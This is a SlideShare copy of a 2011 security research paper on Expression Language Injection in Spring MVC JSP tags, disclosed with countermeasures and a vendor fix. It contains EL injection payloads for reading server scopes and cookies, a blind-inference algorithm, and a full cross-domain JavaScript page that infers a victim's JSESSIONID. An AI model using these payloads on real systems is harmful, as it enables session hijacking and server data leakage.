SlideShare a Scribd company logo

Expression language Injection

Joshin Gomez
Joshin Gomez
Technology
1 of 21
Download to read offline
Expression Language Injection Stefano Di Paola, Minded Security Arshan Dabirsiaghi, Aspect Security
Table of Contents Expression Language Injection Table of Contents 1. Introduction 1.1 Expression Language 1.2 Where is JSP EL Used? 2. Related Work 3. Injecting JSP EL 3.1 Testing for Expression Language Injection Vulnerability 3.2 Reading Information 3.2.1 Default Scopes 3.2.2 Other Scopes 3.2.3 Limits of EL Resolution 3.2.4 Abuse Scenario #1: Server data leakage 3.2.5 Abuse Scenario #2: Application data leakage 3.2.6 Abuse Scenario #3: HttpOnly bypass 3.2.7 Persistent Expression Language Injection 4. Blind Injection 4.1 Inferring Values Via Direct Requests 4.2 Inferring User’s Secrets via Cross Domain Requests 5. Open Source Examples 6. Countermeasures 7. Conclusions 8. References 9. Authors
1. Introduction This paper discusses an undocumented vulnerability class called “Expression Language Injection”, which occurs when attackers control data that is evaluated by an Expression Language (EL) interpreter. It is likely that individuals have performed attacks against EL interpreters used in the past but new, specific attacks against Spring MVC JSP tags are discussed, and the techniques are generally applicable. A new technique for automatic enumeration of server-side data accessible through EL is also introduced. 1.1 Expression Language To provide easy ways of outputting data from an object model that more closely resembles pure scripting languages, “Expression Language” (EL) was developed as part of JSTL (Java Server Pages Standard Tag Library) [1]. Here is an example EL snippet: <c:out value=”person.address.street”/> This snippet finds the Java object (also called a “bean” or “model”) that’s in the current scope under the name of “person”, looks up a member object called “address” by looking for a getter method named “getAddress()”, and furthermore finds the “street” member of that object using the same method search pattern. After showing the equivalent scriptlet used to print the same data, it’s easy to see its utility: <%=HTMLEncoder.encode(((Person)person).getAddress().getStreet())%> This technique would also force the page to explicitly import the Person object, which unnecessarily couples the view to the model when all that’s needed is simple access to the bean’s attributes. Only since the JSP 2.0 specification has EL been available within JSP pages directly, and that’s still how it’s used in most cases. However, it can and has been used in non-view use cases. 1.2 Where is JSP EL Used? JSP EL is a specification (JSR-245 and JSR 252 [2]) and there are many implementations: ● JSP 2.0/2.1: Used by most recently built applications, and delivered as part of the JSTL. ● Jakarta: An older EL implementation built by Apache. ● OGNL: A powerful EL popularized by Struts2/WebWork. ● MVEL: A general purpose EL usable for console applications. ● SPEL: Spring’s custom EL for scripting (not used in JSPs).
2. Related Work Meder Kydyraliev abused unchecked and automatic interpretation of OGNL expression language in request parameters in Struts2 [5]. OGNL exposes many stateful operations which eventually yielded remote command execution. Dinis Cruz wrote about insecure Spring MVC autobinding patterns which could be used to get user data into unexpected bean properties. This could be used to accomplish EL injection in more places [14].
3. Injecting JSP EL A simple use case of JSP EL within a Spring MVC JSP tag is the following: ... <spring:message scope=”${param.foo}”/> ... This will cause the JSP to echo the value of “foo” request parameter to the browser. Since it will be encoded, there is no risk for XSS. However, this particular tag will evaluate any nested JSP EL found within the “scope” attribute, as shown by the following code from org.springframework.web.servlet.tags.MessageTag [9][13]: protected final int doStartTagInternal() throws JspException, IOException { try { String msg = resolveMessage(); msg = isHtmlEscape() ? HtmlUtils.htmlEscape(msg) : msg; msg = this.javaScriptEscape ? JavaScriptUtils.javaScriptEscape(msg) : msg; String resolvedVar = ExpressionEvaluationUtils.evaluateString("var", this.var, this.pageContext); if (resolvedVar != null) { String resolvedScope = ExpressionEvaluationUtils.evaluateString("scope", this.scope, this.pageContext); this.pageContext.setAttribute(resolvedVar, msg, TagUtils.getScope(resolvedScope) ); … In other words, the values passed to these tags are “double evaluated”, which is probably not what the developers intends. Because of that, attackers can provide EL within their input that will be evaluated by the server and sent back down to the client. Abusing this behavior to trick the server into leaking information is an attack we’re calling Expression Language Injection. By looking for similar patterns in the Spring MVC code it’s possible to find similar implementations on several tag attribute definitions. The following table highlights tags which exhibit the dangerous double evaluation behavior in Spring MVC 2.x and 3.01: Tag Attributes <spring:hasBindErrors> name 1 New versions of Spring MVC could introduce new potentially vulnerable tags which are not covered in this paper.
<spring:bind> path <spring:message> arguments, code, text, var, scope, message <spring:theme> arguments, code, text, var, scope, message <spring:nestedpath> path <spring:transform> var, scope, value The vulnerable pattern for EL injection would involve a JSP that contains one or more of the above Spring tag and attribute combinations with some user-controlled piece of information, like a request parameter, header, cookie or a bean value that has been populated with untrusted data. 3.1 Testing for Expression Language Injection Vulnerability Depending on the attributes into which the vulnerability is, finding these vulnerabilities in a blackbox testing scenario can be done by sending certainly valid EL such as: ● ${“aaaa”} (the literal string “aaaa”) and then searching the response text for such data without the EL syntax found around it; ● or ${99999+1} and then searching the response text for 100000. It’s also possible that the EL being interpreted by your payload is expecting a certain legal value (such as as the name of a property key as in <spring:message code=”${value}”/>). In this case, it’s very likely that the EL injected will reference an invalid key and cause an exception. If a generic error message is shown, and the application is using Spring, chances are good that the field is vulnerable to injection. 3.2 Reading Information This section discusses options and limitations for attackers who can inject arbitrary EL. 3.2.1 Default Scopes Even though an unfortunate amount of data is always available to attackers that can read the results of injected EL, there may be severely harmful data available to attackers depending on what’s “laying around” in scope and what resolvers are active in the application. There is a default set of implicitly defined scopes [3] that will contain internal server information: ● applicationScope: global variables. ● requestScope: request attributes. ● sessionScope: normal session variables. ● pageScope: variables necessary for this page alone (not included pages or parents).
● initParam:parameters used to initialize this servlet from web.xml. A live demonstration page is available for interested readers [16]. 3.2.2 Other Scopes Applications can also register their own resolvers which will allow other scopes (or other properties of existing scopes) to be made available. Spring provides optional resolvers to expose its own beans via the web application context with SpringBeanFacesELResolver and WebApplicationContextFacesELResolver [7] [8] (under the scope “webApplicationContext”). These allow all registered Spring beans of all types to be read with EL. This pattern is extremely dangerous since an EL injection vulnerability would allow an attacker to inspect properties of beans unrelated to the view of the application containing sensitive information There may be other scopes introduced by technologies in the target’s stack. For example, Spring WebFlow’s ImplicitFlowVariableELResolver.java [6] exposes many scopes. In the implementation many of these are technically redundant, but for completeness here is the list of scopes available: ● requestParameters ● flashScope ● viewScope ● flowScope ● conversationScope ● messageContext ● externalContext ● flowExecutionContext ● flowExecutionUrl ● currentUser ● currentEvent Here is a snippet from the Spring Faces documentation regarding their increased EL capability [8]: “This allows for JSF users to use the same expression language in their flow definitions as in their JSF views, and to have access to the full chain of JSF resolvers for expression evaluation.” Technologies other than Spring can also provide unexpected resolvers. For instance, there is an Apache library that adds an “applicationContext” scope [7] that also exposes all Spring beans. 3.2.3 Limits of EL Resolution It’s worth noting the limits of standard EL resolution. The following is a list of standard resolvers
set forth by the Unified Expression Language, retrieved from [4]. ArrayELResolver ${myArray[1]} Returns the value at index 1 in the array called myArray BeanELResolver ${employee.lNam Returns the value of the lName property of the e} employee bean ListELResolver ${myList[5]} Returns the value at index 5 of myList list MapELResolver ${myMap.someKey Returns the value stored at the key, someKey, in } the Map, myMap ResourceBundleELResol ${myRB.myKey} Returns the message at myKey in the resource ver bundle called myRB An attacker is limited to whatever operations are possible with the given resolvers. Although there is no contract that such operations be read-only, the specification does not list any operations that well-known have side effects. The following section dictates some simple attacks when able to executing EL Injection. 3.2.4 Abuse Scenario #1: Server data leakage Assuming the simplest vulnerability possible, let’s look at some variables to request which can leak interesting data back: ... <spring:text scope=”${param.foo}”/> ... The request parameter “foo” will be interpreted here. The following table shows what happens when the user passes in different, interesting values for that parameter: Parameter Value Explanation Resulting HTML ${applicationScope} The toString() of the ... application scope object {org.apache.catalina.jsp_classpath=/ contains the classpath home/arshan/ELInjection/target/ and local working ELInjection/WEB-INF/classes/:/ directories, among other home/arshan/ELInjection/target/ things. ELInjection/WEB-INF/lib/aopalliance- 1.0.jar:/home/arshan/ELInjection/ target/ELInjection/WEB-INF/lib/ commons-logging-1.1.1.jar ... javax.servlet.context.tempdir=/ home/arshan/ELInjection/target/ tomcat/work/localEngine/localhost/
ELInjection } ${requestScope} The toString() of the {javax.servlet.forward.quer request scope shows lots y_string=test=messagetext&e of relatively uninteresting xpr=%24%7BrequestScope%7D, things, but may help javax.servlet.forward.request_uri=/ an attacker fingerprint ELInjection/eval.htm, technologies the the javax.servlet.forward.servlet_path=/ application’s virtual URL eval.htm, routing. ... display name [WebApplicationContext for namespace 'vc-servlet']; startup date [Tue Jul 19 22:35:58 EEST 2011]; org.springframework.web.servlet.view .InternalResourceView.DISPATCHED_PAT H=eval.jsp ... } 3.2.5 Abuse Scenario #2: Application data leakage Even within the default scopes, there is very likely to be data to which attackers shouldn’t have access.Developers may perform a sub-select on a set containing sensitive information. With JSP EL injection, attackers will be able to retrieve those values that are just “hanging around”. Consider this example snippet from The JavaEE 5 Tutorial showing usage of SQL tags: <c:set var="bid" value="${param.Add}"/> <sql:query var="books" > select * from PUBLIC.books where id = ? <sql:param value="${bid}" /> </sql:query> The SQL query results are stored in the “books” parameter in the pageContext scope. Given an EL injection, an attacker could read the results from this variable as easily as the developer and get access to other book data. Depending on how the code was written, the connection string or the query itself might also be available. Even savvy developers will not write code to avoid such situations since they’d assume the secrecy of server-side variables. 3.2.6 Abuse Scenario #3: HttpOnly bypass EL Injection can be used to force the server to echo the session cookie back to the browser inside HTML, effectively “bypassing” any HttpOnly protection for application pages vulnerable to cross-site scripting (XSS). Here is an example value that can be injected to read the target’s “JSESSIONID” (shown here unencoded in the querystring): http:///vulnerable.com/spring/foo?param=${cookie["JSESSIONID"].value} Of course, it’s also possible to use drag-and-drop clickjacking [17] techniques to steal this data
from pages that don’t even contain XSS vulnerabilities. 3.2.7 Persistent Expression Language Injection It’s worth noting that as with most other injection attacks, Expression Language Injection could also be leveraged from user controlled stored data just like persistent XSS or second order SQL injection.
4. Blind Injection Any attack described so far, assumes there is an in-band scenario. In other words, it relies on the fact that the information is displayed back in the server response. This is obviously not always possible, since the application could redirect to another page in case of application errors, or simply does not use that value in the HTML. In that case it is still possible to gather information via EL Injection by taking advantage of inference techniques. 4.1 Inferring Values Via Direct Requests The only thing an attacker needs is a condition expression which returns a legit value in case the condition is true and a unexpected value otherwise. According to Expression Language definition [1] in the Operators section, the ternary conditional operator is an accepted construct, and therefore it could be used in order to infer values: ... In addition to the . and [] operators discussed in Variables, the JSP expression language provides the following operators: ● Arithmetic: +, - (binary), *, / and div, % and mod, - (unary) ● Logical: and, &&, or, ||, not, ! ● Relational: ==, eq, !=, ne, <, lt, >, gt, <=, ge, >=, le. Comparisons can be made against other values, or against boolean, string, integer, or floating point literals. ● Empty: The empty operator is a prefix operation that can be used to determine whether a value is null or empty. ● Conditional: A ? B : C. Evaluate B or C, depending on the result of the evaluation of A. ... The latest problem to be solved consists in finding two values that will trigger different responses from the server. In order do this, an attacker can try to abuse conditional and the comparison operator with the following input: ${variableName.value >= ‘charSequence’ ? V1 : V2} Where: ● variableName is the name of the server side attribute the attacker is willing to retrieve the value. ● charSequence is a sequence of characters whose length and content is dynamically built according to inference. ● V1 is a value that will be valid for the EL parser and for the application. ● V2 is a value that will be valid for the EL parser but will trigger some kind of exception in the underlying code. The pseudo code of the linear inference algorithm can be described as follows:
var charset = ”abcdef...”; var idx = 0; var foundSeq = ””; var payload = “${variableName >= “+foundSeq+” ? ‘V1’ : ‘V2’}”; while(1){ If ( response(payload) isFrom V1) { idx++; payload = “${variableName >= “+foundSeq+charset[idx]+” ? ‘V1’ : ‘V2’}”; } else { if ( idx > charset.length ) { print “found ”+ foundSeq; break; } foundSeq=foundSeq+charset[idx-1]; idx = 0; } } As any inference algorithm based on > and < comparision operators, it may be improved using binary search algorithm or other optimization techniques, whose implementation goes beyond the scope of this document. Inference expressions according to attributes: Tags Attribute Name Inference payload example spring:message code ${Condition?"Ok":1>true} spring:theme text arguments scope spring:message message ${Condition? spring:theme org.springframework.context .MessageSourceResolvable: 1>true} spring:bind path beanName2.${Condition?'*':1 >true} spring:nestedPath path ${Condition?"Ok":1>true} spring:hasBindErrors name ${Condition?"Ok":1>true} spring:transform value ${Condition?"Ok":1>true} var scope 2 where beanName is a valid name for an application Bean.
4.2 Inferring User’s Secrets via Cross Domain Requests In case a legitimate user has a valid session an attacker can try to infer data by using server status codes and inference via a malicious page on victim’s browser. As will be described, in this scenario the attacker won’t need any XSS in order to steal cookies or other sensitive data; it is in fact possible to successfully use Expression Language conditional operators to infer complete values taking advantage of browser response using script events with the following hypothesis: 1. The victim needs to be logged in order to give some secret to share. I.E. her session. 2. Vulnerable server shall return two different status codes, like 200 and 404 or 500. The following script will try to steal the victim’s JSESSIONID cookie from an attacker’s off- domain page: <script> var values=""; var url="http://victimhost/App/page.htm?par=${cookie['JSESSIONID'].value.bytes[|IDX| ]==|VAL|?'d':1>true}"; var map="0123456789ABCDEF"; // map of allowed characters var idx=-1; var idx2=-1; var arr=[]; // this var will store the correct values. var scr; var maxLength=32; var reqNumber=1; function getNext(){ return map[idx].charCodeAt(0); } function nextChar(){ idx++; return url.replace("|VAL|",getNext()).replace("|IDX|",idx2); } function $(id){return document.getElementById(id)} function createEl(url){ var scr=document.createElement("script"); // server returns status 20x: it’s a valid value scr.onload=function(){ // let’s save the cookie value and position in the array arr[this.id]=this.getAttribute("x"); $("ciphers").innerHTML=arr.length; if(arr.length==maxLength) $("finalResult").innerHTML="<b>Final Result</b> Your Session Is: "+arr.join(''); };
scr.id=idx2; scr.setAttribute("x",map[idx]); scr.src=url; $("messages").innerHTML="# of Requests:"+reqNumber; reqNumber++; return scr } function go(){ try{ // creates a number of scripts to enumerate all characters in all positions. for(var j=0;j<32;j++) { for(var i=0;i< map.length;i++){ idx2=j; var scr=createEl(nextChar()); document.body.appendChild(scr); } idx=-1;// reset the map index } }catch(r){ } } window.onerror=function(){return true;} </script> <body onload=go()><style>body {color: white; background-color: black}</style> <h3>Secret Retrieving via Expression Language Injection Using Client Side Inference</h3> This page tries to retrieve victim's JSESSIONID using inference against an application vulnerable to Expression Language injection. <div> See .... for more information. </div> <div> <div><b>Attack information:</b> <span id="messages">&nbsp;</span><br>Found: <span id="ciphers">&nbsp;</span></div> <div id="finalResult">&nbsp;</div> </div> Loading victim server on an iframe just to be sure we have a session. <div> <iframe height=1 width=1 src="http://victimhost/App/page.htm"></iframe> </div> <div>This page is used for pure demonstration. Use at your own risk!</div> <div>Authors: Stefano Di Paola and Arshan Dabirsiaghi</div> <div>Date: July 2011</div> </body> A live example can be seen on www.wisec.it [15].
5. Open Source Examples A simple Google Code Search query shows that this problem is indeed found in the wild [10]. One of the first results returned from our simple search is from a software package called CAS, an enterprise single-sign on utility. The logout page contains a simple EL Injection vulnerability [11]: <c:if test="${not empty param['url']}"> <p> <spring:message code="screen.logout.redirect" arguments="${param['url']}"/> </p> </c:if> Here the “code” attribute will be used to look up a server-side property file message, and the request parameter “url” will be substituted into it as part of the message. Any valid EL will be evaluated and substituted into the message returned to the user instead of the user-provided value. Another simple example is from GBIF, a worldwide scientific data collection tool. The login JSP exhibits a similar weakness [12]: <spring:message code="${param['message']}" text=""/>
6. Countermeasures As described in Expression Language documentation [1] developers may be tempted to add the following code in JSP to prevent EL Injection attacks <%@ page isELIgnored ="true" %> Unfortunately, this will have the effect of blocking the interpretation of the EL code found in other tags, resulting in incongruities between Spring and other taglibs. In fact, while it will block the double evaluation problem in Spring taglib, only allowing the first pass evaluation, it will also stop the first pass in legitimate cases and very well may cause breakage. A more effective approach may be to perform data validation best practice against untrusted input and to ensure that output encoding is applied when data arrives on the EL layer, so that no metacharacter is found by the interpreter within the user content before evaluation. The most obvious patterns to detect include “${“ and “#{“, but it may be possible to encode or fragment this data. Finally, SpringSource received an advance copy of this paper and reacted positively, backporting a fix to all previous vulnerable versions. A description of the fix from their release is quoted here at length: A new context parameter has been added called springJspExpressionSupport. When true (the default) the existing behaviour of evaluating EL within the tag will be performed. When running in an environment where EL support is provided by the container, this should be set to false. Note that for Spring Framework 3.1 onwards when running on a Servlet 3.0 or higher container, the correct default will be set automatically. This new attribute is available in: ○ 3.0.6 onwards ○ 2.5.6.SEC03 onwards (community releases) ○ 2.5.7.SR02 (subscription customers)
7. Conclusions Expression Language Injection occurs when user input is evaluated by a J2EE server’s Expression Language resolvers, and a common opportunity for this vulnerability to occur today is with the usage of Spring JSP tags. The impacts of this attack range from a simple HttpOnly bypass to a server-side information leakage technique. This information leakage will differ in severity mostly based on what J2EE technologies are in use and what is in scope of the vulnerable code. One of the most dangerous abuse scenarios involves an attacker controlled page inferring a user’s session ID on a browser that’s currently logged into the vulnerable application. It’s also been shown that this problem exists in the wild and custom countermeasures can be undertaken, but a fix to the framework itself is available at the time of this paper’s release.
8. References [1] The J2EE 1.4 Tutorial. Expression Language. http://download.oracle.com/javaee/1.4/tutorial/ doc/JSPIntro7.html [2] Expression Language Specification. A component of the JavaServer™ Pages Specification. http://jsp.java.net/spec/jsp-2_1-fr-spec-el.pdf [3] A JSTL primer, Part 1: The expression language. Implicit Objects. http://www.ibm.com/developerworks/java/library/j-jstl0211/index.html#N10147 [4] Unified Expression Language. Resolving Expressions. http://download.oracle.com/javaee/5/tutorial/doc/bnahq.html#bnaif [5] oOo.nu. CVE-2010-1870: Struts2/XWork Remote Command Execution. http://blog.o0o.nu/2010/07/cve-2010-1870-struts2xwork-remote.html [6] Google Codesearch. (Search for ImplicitFlowVariableELResolver.java). esearch#VuIw2vEquuM/spring-webflow/trunk/spring-webflow/src/main/java/org/ springframework/webflow/expression/el/ImplicitFlowVariableELResolver.javahttp://google.com/ cod [7] Google Codesearch. (Search for ApplicationContextFilter.java). http://google.com/codesearch#coOE0tRomSs/trunk/activemq-web-console/src/main/java/org/ apache/activemq/web/filter/ApplicationContextFilter.java [8] Spring Framework Documentation. Chapter 6: Spring Faces. http://static.springsource.org/spring-webflow/docs/2.0-m1/reference/spring-faces.html [9] Google Codesearch. (Spring tags’ usage of EL). http://google.com/codesearch#0CkyFaECr-A/trunk/botnodetoolkit/src/thirdparty/ spring/org/springframework/web/util/ ExpressionEvaluationUtils.java&q=file:ExpressionEvaluationUtils%5C.java&type=cs&l=131 [10] Google Codesearch. (Simple Search for EL injection vulnerabilities). http://google.com/codesearch search for file:.jsp <spring:[^>]*".*${[^}]*param [11] Google Codesearch. (CAS casLogoutView.jsp). http://google.com/codesearch#OLuu2DUNjD0/downloads/cas/cas-server-3.0.7- rc1.tar.gz%7CZO1XDTgQolk/cas-server-3.0.7-rc1/webapp/WEB-INF/view/jsp/default/ui/ casLogoutView.jsp&q=file:%5C.jsp%20%3Cspring:.*%5C$%5C%7Bparam [12] Google Codesearch. (GBIF login.jsp).
http://google.com/codesearch#-u99BboDzf8/trunk/portal-web/src/main/webapp/WEB-INF/jsp/ admin/login.jsp&q=file:%5C.jsp%20%3Cspring:.*%5C$%5C%7Bparam&type=cs [13] Spring Framework Documentation. MessageTag properties (note the “el-support” field). http://static.springsource.org/spring/docs/1.2.x/taglib/tag/MessageTag.html [14] Ounce Labs. Two Security Vulnerabilities in the Spring Framework’s MVC. Berg, R., Cruz, D http://o2platform.files.wordpress.com/2011/07/ounce_springframework_vulnerabilities.pdf. [15] Live Example of Inferring User’s Secrets via Cross Domain Requests http://www.wisec.it/spring/springopt.html. [16] Live Example of EL Injection Demo Page http://68.169.49.40:18080/ELInjection/demo.htm [17] Clickjacking, definition http://en.wikipedia.org/wiki/Clickjacking
9. Authors Stefano Di Paola is the CTO and a co-founder of Minded Security, where he is responsible for the Research and Development Lab. Prior to founding Minded Security, Stefano was a freelance security consultant, working for several private, public companies and the University of Florence at the Faculty of Computer Engineering. He has contributed to several sections of the OWASP testing guide and is also the Research & Development Director of OWASP Italian Chapter. Arshan Dabirsiaghi is the Director of Research at Aspect Security, an application security service provider.

Recommended

Asp
AspAsp
AspAdil Jafri
 
JavaScript, VBScript, AJAX, CGI
JavaScript, VBScript, AJAX, CGIJavaScript, VBScript, AJAX, CGI
JavaScript, VBScript, AJAX, CGIAashish Jain
 
Sql injection
Sql injectionSql injection
Sql injectionNitish Kumar
 
Sql injection
Sql injectionSql injection
Sql injectionHemendra Kumar
 
How "·$% developers defeat the web vulnerability scanners
How "·$% developers defeat the web vulnerability scannersHow "·$% developers defeat the web vulnerability scanners
How "·$% developers defeat the web vulnerability scannersChema Alonso
 
Spatial approximate string search Doc
Spatial approximate string search DocSpatial approximate string search Doc
Spatial approximate string search DocSudha Hari Tech Solution Pvt ltd
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injectionamiable_indian
 
Time-Based Blind SQL Injection
Time-Based Blind SQL InjectionTime-Based Blind SQL Injection
Time-Based Blind SQL Injectionmatt_presson
 

Recommended

Asp
AspAsp
AspAdil Jafri
 
JavaScript, VBScript, AJAX, CGI
JavaScript, VBScript, AJAX, CGIJavaScript, VBScript, AJAX, CGI
JavaScript, VBScript, AJAX, CGIAashish Jain
 
Sql injection
Sql injectionSql injection
Sql injectionNitish Kumar
 
Sql injection
Sql injectionSql injection
Sql injectionHemendra Kumar
 
How "·$% developers defeat the web vulnerability scanners
How "·$% developers defeat the web vulnerability scannersHow "·$% developers defeat the web vulnerability scanners
How "·$% developers defeat the web vulnerability scannersChema Alonso
 
Spatial approximate string search Doc
Spatial approximate string search DocSpatial approximate string search Doc
Spatial approximate string search DocSudha Hari Tech Solution Pvt ltd
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injectionamiable_indian
 
Time-Based Blind SQL Injection
Time-Based Blind SQL InjectionTime-Based Blind SQL Injection
Time-Based Blind SQL Injectionmatt_presson
 
SQL Injection Tutorial
SQL Injection TutorialSQL Injection Tutorial
SQL Injection TutorialMagno Logan
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protectionamiable_indian
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 
ieee
ieeeieee
ieeeRadheshyam Dhakad
 
Top 20 Asp.net interview Question and answers
Top 20 Asp.net interview Question and answersTop 20 Asp.net interview Question and answers
Top 20 Asp.net interview Question and answersw3asp dotnet
 
SQL Injection
SQL InjectionSQL Injection
SQL InjectionAbhinav Nair
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
Time-Based Blind SQL Injection using Heavy Queries
Time-Based Blind SQL Injection using Heavy QueriesTime-Based Blind SQL Injection using Heavy Queries
Time-Based Blind SQL Injection using Heavy QueriesChema Alonso
 
Time-Based Blind SQL Injection Using Heavy Queries
Time-Based Blind SQL Injection Using Heavy QueriesTime-Based Blind SQL Injection Using Heavy Queries
Time-Based Blind SQL Injection Using Heavy QueriesChema Alonso
 
Sql injection
Sql injectionSql injection
Sql injectionNikunj Dhameliya
 
Web application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresWeb application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresCade Zvavanjanja
 
SQL Injection
SQL Injection SQL Injection
SQL Injection Adhoura Academy
 
Attackers Vs Programmers
Attackers Vs ProgrammersAttackers Vs Programmers
Attackers Vs Programmersrobin_bene
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONMentorcs
 
SQL Injections (Part 1)
SQL Injections (Part 1)SQL Injections (Part 1)
SQL Injections (Part 1)n|u - The Open Security Community
 
LDAP Injection & Blind LDAP Injection in Web Applications
LDAP Injection & Blind LDAP Injection in Web ApplicationsLDAP Injection & Blind LDAP Injection in Web Applications
LDAP Injection & Blind LDAP Injection in Web ApplicationsChema Alonso
 
MCS,BCS-7(A,B) Visual programming Syllabus for Final exams @ ISP
MCS,BCS-7(A,B) Visual programming Syllabus for Final exams @ ISPMCS,BCS-7(A,B) Visual programming Syllabus for Final exams @ ISP
MCS,BCS-7(A,B) Visual programming Syllabus for Final exams @ ISPAli Shah
 
#nullblr bachav manual source code review
#nullblr bachav manual source code review#nullblr bachav manual source code review
#nullblr bachav manual source code reviewSantosh Gulivindala
 
3. Java Script
3. Java Script3. Java Script
3. Java ScriptJalpesh Vasa
 
Not so blind SQL Injection
Not so blind SQL InjectionNot so blind SQL Injection
Not so blind SQL InjectionFrancisco Ribeiro
 
Ulam undrakh
Ulam undrakhUlam undrakh
Ulam undrakhulmaa
 
Development of a blog system using Codeigniter Framework
Development of a blog system using Codeigniter FrameworkDevelopment of a blog system using Codeigniter Framework
Development of a blog system using Codeigniter FrameworkJoshin Gomez
 

More Related Content

What's hot

SQL Injection Tutorial
SQL Injection TutorialSQL Injection Tutorial
SQL Injection TutorialMagno Logan
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protectionamiable_indian
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 
Top 20 Asp.net interview Question and answers
Top 20 Asp.net interview Question and answersTop 20 Asp.net interview Question and answers
Top 20 Asp.net interview Question and answersw3asp dotnet
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
Time-Based Blind SQL Injection using Heavy Queries
Time-Based Blind SQL Injection using Heavy QueriesTime-Based Blind SQL Injection using Heavy Queries
Time-Based Blind SQL Injection using Heavy QueriesChema Alonso
 
Time-Based Blind SQL Injection Using Heavy Queries
Time-Based Blind SQL Injection Using Heavy QueriesTime-Based Blind SQL Injection Using Heavy Queries
Time-Based Blind SQL Injection Using Heavy QueriesChema Alonso
 
Web application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresWeb application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresCade Zvavanjanja
 
Attackers Vs Programmers
Attackers Vs ProgrammersAttackers Vs Programmers
Attackers Vs Programmersrobin_bene
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONMentorcs
 
LDAP Injection & Blind LDAP Injection in Web Applications
LDAP Injection & Blind LDAP Injection in Web ApplicationsLDAP Injection & Blind LDAP Injection in Web Applications
LDAP Injection & Blind LDAP Injection in Web ApplicationsChema Alonso
 
MCS,BCS-7(A,B) Visual programming Syllabus for Final exams @ ISP
MCS,BCS-7(A,B) Visual programming Syllabus for Final exams @ ISPMCS,BCS-7(A,B) Visual programming Syllabus for Final exams @ ISP
MCS,BCS-7(A,B) Visual programming Syllabus for Final exams @ ISPAli Shah
 
#nullblr bachav manual source code review
#nullblr bachav manual source code review#nullblr bachav manual source code review
#nullblr bachav manual source code reviewSantosh Gulivindala
 

What's hot (20)

SQL Injection Tutorial
SQL Injection TutorialSQL Injection Tutorial
SQL Injection Tutorial
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protection
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injection
 
ieee
ieeeieee
ieee
 
Top 20 Asp.net interview Question and answers
Top 20 Asp.net interview Question and answersTop 20 Asp.net interview Question and answers
Top 20 Asp.net interview Question and answers
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and Security
 
Time-Based Blind SQL Injection using Heavy Queries
Time-Based Blind SQL Injection using Heavy QueriesTime-Based Blind SQL Injection using Heavy Queries
Time-Based Blind SQL Injection using Heavy Queries
 
Time-Based Blind SQL Injection Using Heavy Queries
Time-Based Blind SQL Injection Using Heavy QueriesTime-Based Blind SQL Injection Using Heavy Queries
Time-Based Blind SQL Injection Using Heavy Queries
 
Sql injection
Sql injectionSql injection
Sql injection
 
Web application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresWeb application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasures
 
SQL Injection
SQL Injection SQL Injection
SQL Injection
 
Attackers Vs Programmers
Attackers Vs ProgrammersAttackers Vs Programmers
Attackers Vs Programmers
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
SQL Injections (Part 1)
SQL Injections (Part 1)SQL Injections (Part 1)
SQL Injections (Part 1)
 
LDAP Injection & Blind LDAP Injection in Web Applications
LDAP Injection & Blind LDAP Injection in Web ApplicationsLDAP Injection & Blind LDAP Injection in Web Applications
LDAP Injection & Blind LDAP Injection in Web Applications
 
MCS,BCS-7(A,B) Visual programming Syllabus for Final exams @ ISP
MCS,BCS-7(A,B) Visual programming Syllabus for Final exams @ ISPMCS,BCS-7(A,B) Visual programming Syllabus for Final exams @ ISP
MCS,BCS-7(A,B) Visual programming Syllabus for Final exams @ ISP
 
#nullblr bachav manual source code review
#nullblr bachav manual source code review#nullblr bachav manual source code review
#nullblr bachav manual source code review
 
3. Java Script
3. Java Script3. Java Script
3. Java Script
 
Not so blind SQL Injection
Not so blind SQL InjectionNot so blind SQL Injection
Not so blind SQL Injection
 

Viewers also liked

Ulam undrakh
Ulam undrakhUlam undrakh
Ulam undrakhulmaa
 
Development of a blog system using Codeigniter Framework
Development of a blog system using Codeigniter FrameworkDevelopment of a blog system using Codeigniter Framework
Development of a blog system using Codeigniter FrameworkJoshin Gomez
 
Ulam undrakh-zaminuud
Ulam undrakh-zaminuudUlam undrakh-zaminuud
Ulam undrakh-zaminuudulmaa
 
ขอสอบ Eng O-net 51
ขอสอบ Eng O-net 51 ขอสอบ Eng O-net 51
ขอสอบ Eng O-net 51 Mind Patchon
 
Engaging Alumni through Technology: Cornell Class of '86
Engaging Alumni through Technology: Cornell Class of '86Engaging Alumni through Technology: Cornell Class of '86
Engaging Alumni through Technology: Cornell Class of '86Hilory Wagner
 
ขอสอบ Eng O-net 52
ขอสอบ Eng O-net 52ขอสอบ Eng O-net 52
ขอสอบ Eng O-net 52Mind Patchon
 
Where are we now: A review of Arabic studies on Open Access 2005-2015
